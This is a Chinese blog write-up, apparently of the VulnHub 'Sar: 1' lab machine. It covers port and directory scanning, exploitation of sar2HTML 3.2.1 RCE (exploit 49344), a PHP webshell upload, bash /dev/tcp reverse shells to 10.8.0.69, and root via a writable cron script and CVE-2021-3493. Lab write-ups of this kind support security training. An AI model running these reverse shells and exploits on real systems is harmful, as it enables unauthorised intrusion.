【打靶练习】vulnhub Sar: 1

端口扫描

nmap -p- 172.16.33.13

在这里插入图片描述
惯例扫一下端口服务

nmap -p80 -sV 172.16.33.13

在这里插入图片描述

web指纹识别&目录扫描

直接访问80端口
在这里插入图片描述
收集到的信息:系统Ubuntu、软件apache、默认web路径/var/www/html/index.html

目录扫描

dirsearch -u http://172.16.33.13

在这里插入图片描述
通过phpinfo可以知道目标网站语言是php,并可以获取到大量系统信息
通过robots.txt发现隐藏路径sar2HTML

在这里插入图片描述
在这里插入图片描述
到这里发现网站指纹信息:sar2HTML 3.2.1
同时,发现存在文件上传功能,但是不知道上传路径无法直接利用
在这里插入图片描述

漏洞搜索

先搜一下是否有网站相关的漏洞

searchsploit sar2html

在这里插入图片描述

searchsploit -m 49344

漏洞利用

python 49344.py

在这里插入图片描述
收集信息:系统账户www-data、网站目录结构
经过搜索,发现文件上传路径为/var/www/html/
在这里插入图片描述
方式反弹shell均失败,猜测在这个环境下很多命令无法执行,可以利用文件上传上传一个webshell,或者上传一个php的反弹shell脚本,然后触发执行

上传php webshell

在这个网站生成webshell代码:https://www.revshells.com/在这里插入图片描述

上传反弹shell脚本
在这里插入图片描述
访问index1.php触发命令执行
在这里插入图片描述

反弹shell

kali监听4444端口

nc -nvlp 4444

在这里插入图片描述

webshell命令执行php反弹shell

/bin/bash -i >& /dev/tcp/10.8.0.69/4444 0>&1

先进行url编码然后通过webshell执行
在这里插入图片描述
在这里插入图片描述

提权1

目前得到的shell还不是完整的shell,先通过python升级shell
经过尝试通过python3升级shell失败
再尝试通过这个shell再反弹一个shell

/bin/bash -i >& /dev/tcp/10.8.0.69/4445 0>&1

在这里插入图片描述

在这里插入图片描述

尝试suid提权,失败
在这里插入图片描述
尝试定时任务提权
在这里插入图片描述
在这里插入图片描述
发现定时任务中,root用户通过finally.sh执行了write.sh,而write.sh当前用户可写

尝试上传一个新的write.sh替换当前文件
在这里插入图片描述

在这里插入图片描述
kali监听4446端口,等待反弹shell连接
在这里插入图片描述

提权2

利用Ubuntu内核漏洞提权(CVE-2021-3493)
在这里插入图片描述

目标靶机环境没有gcc编译工具,所以直接将编译好的exp下载到目标靶机中运行
在这里插入图片描述

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值